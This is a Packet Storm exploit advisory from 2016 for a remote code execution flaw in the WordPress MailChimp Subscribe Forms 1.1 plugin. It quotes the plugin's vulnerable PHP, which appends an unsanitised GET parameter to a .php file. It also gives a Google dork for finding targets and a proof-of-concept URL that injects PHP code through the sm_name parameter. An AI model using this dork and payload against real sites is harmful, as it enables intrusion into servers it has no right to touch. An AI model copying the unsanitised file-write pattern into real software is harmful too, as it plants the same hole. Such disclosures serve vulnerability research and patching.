WordPress MailChimp Subscribe Forms 1.1 Remote Code Execution

2016-03-23T00:00:00
ID PACKETSTORM:136396
Type packetstorm
Reporter CrashBandicot
Modified 2016-03-23T00:00:00

Description

                                        
                                            `# Exploit Title: Wordpress Plugin MailChimp Subscribe Forms - Remote Code Execution  
# Date: 23-03-2016  
# Exploit Author: CrashBandicot  
# Google Dork : inurl:/wp-content/plugins/mailchimp-subscribe-sm/  
# Vendor Homepage: https://fr.wordpress.org/plugins/mailchimp-subscribe-sm/  
# Tested on: MSWin32  
# Version: 1.1  
  
# Vulnerability in GET  
# Put your mail for subscribe and send but add in URL the Parameter sm_name with PHP Code  
  
# Vulnerable Files : mailchimp-subscribe-sm/inc/store-address.php  
  
18. if(!preg_match("/^[_a-z0-9-]+(\.[_a-z0-9-]+)*@[a-z0-9-]+(\.[a-z0-9-]+)*$/i", $_GET['sm_email'])) {  
...  
23. $smf_data = '* Name : '.$_GET['sm_name'];  
24. $smf_data .= ' Email : '.$_GET['sm_email'].' , '. PHP_EOL;  
...  
36. $file = "sm_subscribers_list.php";   
...  
39. $fp = fopen($file, "a");   
40. fwrite($fp, $smf_data);  
...  
42. fclose($fp);  
  
# PoC : localhost/subscribe/?sm_email=0day@0day.com&sm_name=<?php phpinfo(); ?>&submit=subscribe  
  
# Result in file sm_subscribers_list.php  
  
# PicS : http://i.imgur.com/HHtuycC.png  
`